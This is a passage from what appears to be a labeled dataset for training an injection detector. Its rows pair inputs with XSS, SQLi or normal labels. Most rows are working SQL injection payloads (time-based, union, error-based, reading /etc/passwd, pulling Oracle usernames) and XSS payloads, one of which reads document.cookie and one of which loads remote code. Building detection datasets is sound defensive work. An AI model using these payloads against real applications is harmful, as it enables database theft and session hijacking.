) ) ) and ( ( ( 'isyg' = 'isyg",2,SQLi,15550 -"select * from users where id = 1 or @#""{ = 1 union select 1,version ( ) -- 1",2,SQLi,11997 -"-5438"" ) union all select 3170,3170--",2,SQLi,19766 -<param onfocusout=alert(1) tabindex=1 id=x></param><input autofocus>,1,XSS,2113 -"<style>:target {color: red;}</style><style id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></style>",1,XSS,2791 -<center onpointerup=alert(1)>XSS</center>,1,XSS,8686 -"1%"" ) ) and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( ""%"" = """,2,SQLi,12512 -"<var onkeypress=""alert(1)"" contenteditable>test</var>",1,XSS,8320 -1' in boolean mode ) union all select null#,2,SQLi,22138 -"-2276"" ) ) as qwow where 2321 = 2321 or 3534 = 2971--",2,SQLi,14342 -1 ) or pg_sleep ( __TIME__ ) --,2,SQLi,11606 -"<u onclick=""alert(1)"">test</u>",1,XSS,3593 -"{""id"":null,""firstName"":""Lee"",""lastName"":""Shaun"",""address"":""602 SOUTH MICHIGAN ST, SOUTH BEND IN 46601"",""city"":""579"",""telephone"":""2269950693""}",0,normal,25393 -"select * from users where id = 1 or ""; ( "" or 1 = 1 -- 1",2,SQLi,11796 -"admin"" ) or ( ""1"" = ""1""--",2,SQLi,11610 -"1 ) ) ) and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,19301 -"<map onmousedown=""alert(1)"">test</map>",1,XSS,3483 -"<basefont onmouseup=""alert(1)"">test</basefont>",1,XSS,6112 -select ( case when ( 6961 = 7460 ) then 1 else 6961* ( select 6961 from master..sysdatabases ) end ) --,2,SQLi,12437 -"{""id"":null,""firstName"":""Htain"",""lastName"":""Linn"",""address"":""9 Plainsboro Rd #598"",""city"":""20"",""telephone"":""3220629817""}",0,normal,25534 -"1 and make_set ( 6911 = 1867,1867 )",2,SQLi,19953 -"1; ( load_file ( char ( 47,101,116,99,47,112,97,115,115,119,100 ) ) ) ,1,1,1;",2,SQLi,11451 -"1"" ) ) as dshc where 9911 = 9911 or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,14448 -"1%"" ) ) ) or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) and ( ( ( ""%"" = """,2,SQLi,20228 -select case when 5308 = 6745 then 1 else null end--,2,SQLi,17145 -<x contenteditable onkeypress=alert(1)>press any key!,1,XSS,9326 -<x oncopy=alert(1)>copy this!,1,XSS,9333 -Where's the best place to take a stroll?,0,normal,24056 -Order a pepperoni pie.,0,normal,22908 -"1%' ) ) ) union all select null,null,null,null--",2,SQLi,15980 -"<a href=""jav&#97ascript:javascript:alert(1)"">test1</a>",1,XSS,749 -"1' ) ) and elt ( 4249 = 4249,7259 ) and ( ( 'oucg' = 'oucg",2,SQLi,22471 -"-4381 or make_set ( 6118 = 3095,3095 ) # lkcr",2,SQLi,20608 -""")) or sleep(__TIME__)=""",2,SQLi,10882 -"1' or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and 'akki' = 'akki",2,SQLi,17039 -onCopy,1,XSS,9643 -"1 ) ) ) or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,16700 -"1'+ ( select 'ixvd' where 4772 = 4772 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) ) +'",2,SQLi,21329 -"1%"" ) ) union all select null,null,null,null,null,null,null--",2,SQLi,15189 -"<s draggable=""true"" ondragend=""alert(1)"">test</s>",1,XSS,8649 -<colgroup onpointerenter=alert(1)>XSS</colgroup>,1,XSS,6154 -Filter the spam calls.,0,normal,22899 -"-5300' union all select 2750,2750,2750,2750,2750,2750--",2,SQLi,14948 -"{""id"":null,""name"":""below""}",0,normal,25424 -<video/poster/onerror=alert()>,1,XSS,1104 -"<a href=""\xE3\x80\x80javascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,504 -\xE2\x81\x9Fjavascript:javascript:alert(1),1,XSS,9503 -"""+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--",2,SQLi,11043 -"<div style=""x:expression((window.r==1)?'':eval('r=1;",1,XSS,1248 -"1"" where 5250 = 5250",2,SQLi,15955 -"1', ( select ( case when ( 8382 = 8382 ) then 1 else 1/ ( select 0 ) end ) )",2,SQLi,15598 -"AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( USERNAME ) FROM ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS ) WHERE LIMIT = 7 ) ) AND 'i' = 'i",2,SQLi,12173 -"-6746"" ) or ( 8459 = 8459 ) *4906 and ( ""kohi"" like ""kohi",2,SQLi,14402 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#",2,SQLi,10504 -"{""id"":null,""name"":""Vegiemon""}",0,normal,26008 -"1"" ) ) and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) and ( ( ""ykhp"" like ""ykhp",2,SQLi,14253 -"1 ) as guru where 7615 = 7615 union all select null,null,null,null,null,null,null,null,null,null#",2,SQLi,18731 -"1' ) ) procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) and ( ( 'kufi' = 'kufi",2,SQLi,21507 -( select * from ( select ( sleep ( 5 ) ) ) srmq ) and ( 'pgth' = 'pgth,2,SQLi,14162 -ORDER BY 1,2,SQLi,10340 -AND 1 = utl_inaddr.get_host_address ( ( SELECT SYS.LOGIN_USER FROM DUAL ) ) AND 'i' = 'i,2,SQLi,11629 -"-5726%"" ) ) or 6872 = 6872 and ( ( ""%"" = """,2,SQLi,12992 -"<ins onmouseout=""alert(1)"">test</ins>",1,XSS,4069 -materialized,0,normal,23364 -"<track onbeforepaste=""alert(1)"" contenteditable>test</track>",1,XSS,8658 -"<content draggable=""true"" ondrag=""alert(1)"">test</content>",1,XSS,2389 -&lt;STYLE&gt;BODY{-moz-binding:url(&quot;http://ha.ckers.org/xssmoz.xml#xss&quot;)}&lt;/STYLE&gt;,1,XSS,1357 -"1%' ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) and ( '%' = '",2,SQLi,19307 -select ( case when ( 5740 = 7636 ) then 5740 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual--,2,SQLi,12557 -1 where 5828 = 5828 and ( 3020 = 3020 ) *6703--,2,SQLi,17673 -"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><address id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></address>",1,XSS,7047 -"1%"" waitfor delay '0:0:5' and ""%"" = """,2,SQLi,15370 -"1 ) where 2473 = 2473 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) --",2,SQLi,17122 -",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* -,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--",2,SQLi,22696 -<nobr id=x tabindex=1 onactivate=alert(1)></nobr>,1,XSS,2233 -"<hr oncut=""alert(1)"" contenteditable>test</hr>",1,XSS,7446 -"{""id"":null,""firstName"":""Grasyah"",""lastName"":""Santhchez"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",0,normal,25667 -"1' or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and 'obax' like 'obax",2,SQLi,18473 -Where's the reiki practitioner?,0,normal,23830 -<aside id=x tabindex=1 onfocus=alert(1)></aside>,1,XSS,8241 -"1%"" ) and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) and ( ""%"" = """,2,SQLi,22074 -"<!--<img src=""--><img src=x onerror=alert(1)//"">//INJECTX",1,XSS,9905 -"-8080"" ) as nlos where 8917 = 8917 union all select 8917,8917,8917,8917--",2,SQLi,12851 -"<audio onbeforecopy=""alert(1)"" contenteditable>test</audio>",1,XSS,8500 -<xmp id=x tabindex=1 onbeforedeactivate=alert(1)></xmp><input autofocus>,1,XSS,2646 -Modify the privacy policy for compliance.,0,normal,23176 -"1' ) or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) and ( 'vxqs' = 'vxqs",2,SQLi,13142 -"<hr onmouseenter=""alert(1)"">test</hr>",1,XSS,2300 -"1"" or elt ( 6272 = 6272,sleep ( 5 ) ) and ""zzca"" = ""zzca",2,SQLi,19205 -"1"" waitfor delay '0:0:5' and ""dvfr"" like ""dvfr",2,SQLi,13177 --4331 ) as inpx where 9804 = 9804 union all select 9804#,2,SQLi,15576 -"1' where 4245 = 4245 union all select null,null--",2,SQLi,21335 -"<fieldset draggable=""true"" ondragenter=""alert(1)"">test</fieldset>",1,XSS,3729 -"1%"" ) ) ) and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( ( ( ""%"" = """,2,SQLi,14168 -"1%"" ) or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,16239 -select sleep ( 5 ) and ( ( 'keoy' = 'keoy,2,SQLi,13436 -"<audio onmouseover=""alert(1)"">test</audio>",1,XSS,5517 -"select * from users where id = 1 or "". ) "" or 1 = 1 -- 1",2,SQLi,11704 -"<set attributeName=""xlink:href"" begin=""accessKey(a)"" to=""//example.com/?a"" />",1,XSS,9290 -"<img onclick=""alert(1)"">test</img>",1,XSS,7683 -<map id=x tabindex=1 onbeforedeactivate=alert(1)></map><input autofocus>,1,XSS,5555 -<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe,1,XSS,317 -"1%' ) ) ) and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,13319 -"-9209%"" ) ) ) union all select 3736,3736,3736--",2,SQLi,22388 -Check conditions where necessary.,0,normal,23514 -"<strike onpaste=""alert(1)"" contenteditable>test</strike>",1,XSS,5291 -Select your appeal.,0,normal,25123 -<rb onpointerenter=alert(1)>XSS</rb>,1,XSS,5363 -Where's the mountain?,0,normal,23700 -"1"" ) as ktnq where 9005 = 9005",2,SQLi,17131 -<big id=x tabindex=1 onbeforedeactivate=alert(1)></big><input autofocus>,1,XSS,8050 -"-8034"" ) where 1292 = 1292 union all select 1292,1292,1292,1292,1292#",2,SQLi,17811 -Join the hiking expedition.,0,normal,22785 -"1"" ) ) as bovm where 5560 = 5560 union all select null,null,null,null,null,null,null#",2,SQLi,20555 --8453 ) ) ) or 3038 = 3038,2,SQLi,21264 -"1'|| ( select 'hrpa' where 1973 = 1973 union all select null,null,null,null,null,null,null,null,null--",2,SQLi,15336 -"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><nextid id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></nextid>",1,XSS,5803 -Merge the project teams.,0,normal,22921 -"1'+ ( select 'drvv' where 5622 = 5622 and 3580 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,15263 -"<noscript onbeforecut=""alert(1)"" contenteditable>test</noscript>",1,XSS,8337 -"1' and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )",2,SQLi,20010 -"1' ) and make_set ( 8403 = 8403,8899 ) and ( 'ojag' = 'ojag",2,SQLi,12925 -"1 ) ) ) union all select null,null,null,null,null,null,null,null,null,null--",2,SQLi,17318 -"<IMG SRC=""jav&#x0A;ascript:alert('XSS');"">",1,XSS,242 -"1%"" ) and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ""%"" = """,2,SQLi,17128 -<bdo id=x tabindex=1 onfocus=alert(1)></bdo>,1,XSS,2054 -"exp/*<A STYLE='no\:no(""*//*"");",1,XSS,8405 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#",2,SQLi,10582 --7054 ) as gzvf where 9146 = 9146 or 3038 = 3038,2,SQLi,13418 -"<multicol onkeypress=""alert(1)"" contenteditable>test</multicol>",1,XSS,4310 -",NULL)%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,10902 -onUndo,1,XSS,9723 -"<svg onbeforepaste=""alert(1)"" contenteditable>test</svg>",1,XSS,3205 -"1 ) ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( 8867 = 8867",2,SQLi,19540 -"<meta onmousedown=""alert(1)"">test</meta>",1,XSS,2754 -<input type=image src=1 onerror=alert(1)>,1,XSS,1695 -"<div draggable=""true"" contenteditable>drag me</div><bdo ondragover=alert(1) contenteditable>drop here</bdo>",1,XSS,6353 -"1%"" ) ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( ""%"" = """,2,SQLi,16220 -1 ) ) as jvvs where 9594 = 9594,2,SQLi,17792 -"-3620'|| ( select 'kmei' where 8533 = 8533 union all select 8533,8533,8533,8533--",2,SQLi,17993 -"1%' ) ) ) union all select null,null,null,null,null,null,null,null,null,null--",2,SQLi,19425 -(SELECT * FROM (SELECT(SLEEP(5)))YYYY)#,2,SQLi,11218 -"1"" where 3221 = 3221 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) --",2,SQLi,21369 --8701%' ) ) or ( 4843 = 1690 ) *1690 and ( ( '%' = ',2,SQLi,16144 -"AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=5)) AND 'i'='i",2,SQLi,11153 -<menuitem onpointerup=alert(1)>XSS</menuitem>,1,XSS,4443 -<base onpointerover=alert(1)>XSS</base>,1,XSS,5419 -"-5763' ) ) ) union all select 1640,1640,1640,1640,1640,1640,1640,1640,1640,1640#",2,SQLi,21987 -<IMG SRC=JaVaScRiPt:alert('')>,1,XSS,2698 -"-9860%"" union all select 6996,6996,6996,6996,6996,6996#",2,SQLi,15600 -"<style>@keyframes x{}</style><isindex style=""animation-name:x"" onanimationstart=""alert(1)""></isindex>",1,XSS,4447 -Select a topic for your presentation.,0,normal,24329 -"<aside onpaste=""alert(1)"" contenteditable>test</aside>",1,XSS,6290 -"select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and ( ( 7700 = 7700",2,SQLi,20488 -"<map oncut=""alert(1)"" contenteditable>test</map>",1,XSS,8283 -"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><details id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></details>",1,XSS,2021 --9688%' ) ) or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( '%' = ',2,SQLi,15181 -"<plaintext onmousedown=""alert(1)"">test</plaintext>",1,XSS,2933 -"1' ) ) ) or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) and ( ( ( 'eugs' = 'eugs",2,SQLi,12741 -"1%"" ) ) and elt ( 4249 = 4249,7259 ) and ( ( ""%"" = """,2,SQLi,12521 -"<script onkeydown=""alert(1)"" contenteditable>test</script>",1,XSS,4212 -1 and sleep(5)--,2,SQLi,11227 -"-->'""/></sCript><deTailS open x="">"" ontoggle=(co\u006efirm)``>",1,XSS,9607 -Select the dessert.,0,normal,25001 -"1' and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and 'bxjo' like 'bxjo",2,SQLi,13390 -"1 union all select null,null#",2,SQLi,12392 -"1' union all select null,null,null,null,null#",2,SQLi,18200 -<link onpointerdown=alert(1)>XSS</link>,1,XSS,4405 -1%' rlike sleep ( 5 ) #,2,SQLi,14151 -"<td draggable=""true"" ondragenter=""alert(1)"">test</td>",1,XSS,8317 -trigger,0,normal,23342 -"<noscript draggable=""true"" ondragleave=""alert(1)"">test</noscript>",1,XSS,3508 -<embed onpointermove=alert(1)>XSS</embed>,1,XSS,3417 --1890' ) ) ) or 8526 = 1389 and ( ( ( 'ecgt' = 'ecgt,2,SQLi,12755 -Determine fields where required.,0,normal,23529 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6",2,SQLi,10782 -"-1302"" ) ) as rshr where 2800 = 2800 or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --",2,SQLi,17897 -"1"" ) where 2570 = 2570 and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,19248 -"<i draggable=""true"" ondragend=""alert(1)"">test</i>",1,XSS,4801 -"{""id"":null,""firstName"":""Lalyn"",""lastName"":""Astorga"",""address"":""15 Woodlands Loop, #01-15"",""city"":""32"",""telephone"":""1459836365""}",0,normal,25592 -"-4945 or make_set ( 9354 = 9354,7185 )",2,SQLi,17597 -"1"" ) as ssbz where 8885 = 8885 union all select null,null,null,null,null,null,null,null,null--",2,SQLi,13841 -"<template onmouseover=""alert(1)"">test</template>",1,XSS,3394 -"<dl onmousemove=""alert(1)"">test</dl>",1,XSS,4086 -"1 ) and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) and ( 5220 = 5220",2,SQLi,16276 -"1' ) as nmzp where 3794 = 3794 and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,20660 -"1"" ) ) procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) and ( ( ""hhwy"" = ""hhwy",2,SQLi,19200 -1'|| ( select 'uebk' from dual where 6990 = 6990,2,SQLi,20323 -"<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>",1,XSS,876 -onBlur,1,XSS,9636 -"1%' ) and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --",2,SQLi,20126 -( select * from ( select ( sleep ( 5 ) ) ) srmq ) and 'fdgq' = 'fdgq,2,SQLi,12620 -<svg><aside onload=alert(1)></aside>,1,XSS,8618 -"1' ) ) ) union all select null,null,null,null#",2,SQLi,20166 -"<wbr onbeforecut=""alert(1)"" contenteditable>test</wbr>",1,XSS,5479 -<caption onpointerleave=alert(1)>XSS</caption>,1,XSS,3468 -select pg_sleep ( 5 ) ) +',2,SQLi,21948 -"<basefont onkeypress=""alert(1)"" contenteditable>test</basefont>",1,XSS,5377 -<script onpointerout=alert(1)>XSS</script>,1,XSS,7327 -"-1438 where 6759 = 6759 union all select 6759,6759#",2,SQLi,12743 -Join the conversation now.,0,normal,22771 -<input4 onpointerdown=alert(1)>XSS</input4>,1,XSS,7800 -"1' ) or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( 'ireg' like 'ireg",2,SQLi,18513 -select ( case when ( 9030 = 6952 ) then 1 else 9030* ( select 9030 from master..sysdatabases ) end ) --,2,SQLi,19605 -Fetch records where required.,0,normal,23531 -Where's the subway station?,0,normal,23680 -1' ) as oknw where 8777 = 8777,2,SQLi,12241 -<head id=x tabindex=1 onfocus=alert(1)></head>,1,XSS,3486 -<rb onblur=alert(1) tabindex=1 id=x></rb><input autofocus>,1,XSS,7666 -&lt;A HREF=&quot;//www.google.com/&quot;&gt;XSS&lt;/A&gt;,1,XSS,1412 -"1' ) ) and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --",2,SQLi,14247 -"1' ) as mvai where 5856 = 5856 and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) --",2,SQLi,12625 -"<svg draggable=""true"" ondragleave=""alert(1)"">test</svg>",1,XSS,8188 -1 ) and 5196 = 9002,2,SQLi,17606 -"<menuitem onkeydown=""alert(1)"" contenteditable>test</menuitem>",1,XSS,5355 -"<u draggable=""true"" ondragleave=""alert(1)"">test</u>",1,XSS,5928 -//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//,1,XSS,827 -onMouseWheel,1,XSS,9685 -<script>\u{61}lert(1)</script>,1,XSS,183 -"-1408 ) ) union all select 5715,5715,5715,5715,5715,5715--",2,SQLi,16232 -<svg><textarea onload=alert(1)></textarea>,1,XSS,3024 -"<style>:target {transform: rotate(180deg);}</style><hgroup id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></hgroup>",1,XSS,7096 -"1' or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,14710 -select name from syscolumns where id = ( sele ...,2,SQLi,11928 -<tr onpointerdown=alert(1)>XSS</tr>,1,XSS,5550 -I want to choose a restaurant for dinner.,0,normal,23883 -"-3913"" where 6085 = 6085 union all select 6085,6085,6085,6085,6085,6085,6085#",2,SQLi,20606 -hi' or 'a'='a,2,SQLi,10121 -"<select oncontextmenu=""alert(1)"">test</select>",1,XSS,7016 -"<dfn onmouseout=""alert(1)"">test</dfn>",1,XSS,3747 -"<div draggable=""true"" contenteditable>drag me</div><ol ondragover=alert(1) contenteditable>drop here</ol>",1,XSS,8130 -I'm planning to pick up some groceries.,0,normal,24086 -"1"" or 4240 = ( select 4240 from pg_sleep ( 5 ) ) --",2,SQLi,15430 -"<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script ????????????",1,XSS,9249 -"1"" ) or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ""bvdv"" like ""bvdv",2,SQLi,19043 -"iif ( 2205 = 4764,1,1/0 )",2,SQLi,17328 -<script>Function`X${document.location.hash.substr`1`}```</script>,1,XSS,135 -<rtc onpointerup=alert(1)>XSS</rtc>,1,XSS,6346 -select ( case when ( 3486 = 6373 ) then 3486 else 3486* ( select 3486 from mysql.db ) end ) #,2,SQLi,19456 -"1%' ) ) ) or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) and ( ( ( '%' = '",2,SQLi,14949 -"<iframe onmouseover=""alert(1)"">test</iframe>",1,XSS,4610 -") or (x"")=(""x",2,SQLi,9962 -&lt;STYLE&gt;.XSS{background-image:url(&quot;javascript:alert(&apos;XSS&apos;)&quot;);}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;,1,XSS,1351 -"<fieldset onmousedown=""alert(1)"">test</fieldset>",1,XSS,7657 -"<strong onmouseenter=""alert(1)"">test</strong>",1,XSS,6012 -"1' ) where 7887 = 7887 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) --",2,SQLi,16696 -"-4015'|| ( select 'qeqv' from dual where 1437 = 1437 union all select 1437,1437,1437,1437,1437,1437,1437,1437,1437#",2,SQLi,19784 -"<style>:target {color:red;}</style><template id=x style=""transition:color 1s"" ontransitionend=alert(1)></template>",1,XSS,5654 -",NULL)%20waifor%20delay%20'0:0:20'%20/*",2,SQLi,10904 -"<style><img title=""</style><img src onerror=alert(1)>""></style>",1,XSS,112 -"<var onclick=""alert(1)"">test</var>",1,XSS,2708 -1'|| ( select 'idna' from dual where 2683 = 2683 rlike ( select ( case when ( 3201 = 9748 ) then 1 else 0x28 end ) ) ) ||',2,SQLi,20937 -"<style>:target {color:red;}</style><img id=x style=""transition:color 1s"" ontransitionend=alert(1)></img>",1,XSS,8332 -"<time onmouseenter=""alert(1)"">test</time>",1,XSS,4294 -"print ""<IMG SRC=java\0script:alert(\""\"")>"";' >",1,XSS,8674 -"1 union all select null,null,null,null,null--",2,SQLi,14870 -"select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and 'bzxo' like 'bzxo",2,SQLi,19940 -"<canvas onmouseover=""alert(1)"">test</canvas>",1,XSS,7412 --6755 ) or 9323 = 9323#,2,SQLi,14561 -Select your affirm.,0,normal,25143 -Select your exchange.,0,normal,25228 -<sup onpointerup=alert(1)>XSS</sup>,1,XSS,6207 -"1 ) ) as krzi where 8727 = 8727 or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,20103 -1 or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) # lwfs,2,SQLi,12690 -Select delete.,0,normal,24784 -<x/onxxx=1,1,XSS,9351 -Delete the outdated messages from your chat.,0,normal,23183 -Join tables where valid.,0,normal,23520 -"-6778 ) as xutm where 6442 = 6442 union all select 6442,6442,6442,6442,6442,6442#",2,SQLi,22386 --2573 ) ) order by 1#,2,SQLi,12682 -"1 ) where 5309 = 5309 or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,16624 -HAVING 1=0,2,SQLi,10246 -<svg><u onload=alert(1)></u>,1,XSS,4895 -"1"" ) ) ) and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) and ( ( ( ""uncg"" = ""uncg",2,SQLi,21875 -<img id=x tabindex=1 onbeforedeactivate=alert(1)></img><input autofocus>,1,XSS,3103 -"<b onkeyup=""alert(1)"" contenteditable>test</b>",1,XSS,8122 -Insert the memory card into the slot.,0,normal,23088 -&lt;A HREF=&quot;http://www.gohttp://www.google.com/ogle.com/&quot;&gt;XSS&lt;/A&gt;,1,XSS,1419 -1%' ) ) ) and 3916 = 6327--,2,SQLi,14319 --3559' ) or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ),2,SQLi,21397 -<canvas id=x tabindex=1 onbeforedeactivate=alert(1)></canvas><input autofocus>,1,XSS,3845 -"1"" ) ) union all select null,null--",2,SQLi,16650 -Insert the new SIM card.,0,normal,22947 -"1"" and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )",2,SQLi,17872 -Where did you find it?,0,normal,23660 -"<tr onkeypress=""alert(1)"" contenteditable>test</tr>",1,XSS,5554 -"-4318"" ) as vpvt where 5543 = 5543 union all select 5543,5543,5543,5543,5543,5543--",2,SQLi,17069 -"<hr oncopy=""alert(1)"" contenteditable>test</hr>",1,XSS,4744 -"UNION ALL SELECT 1,2,3,4,5--",2,SQLi,10600 -]-(SELECT 0 WHERE 1337=1337 AND (SELECT 1337 FROM 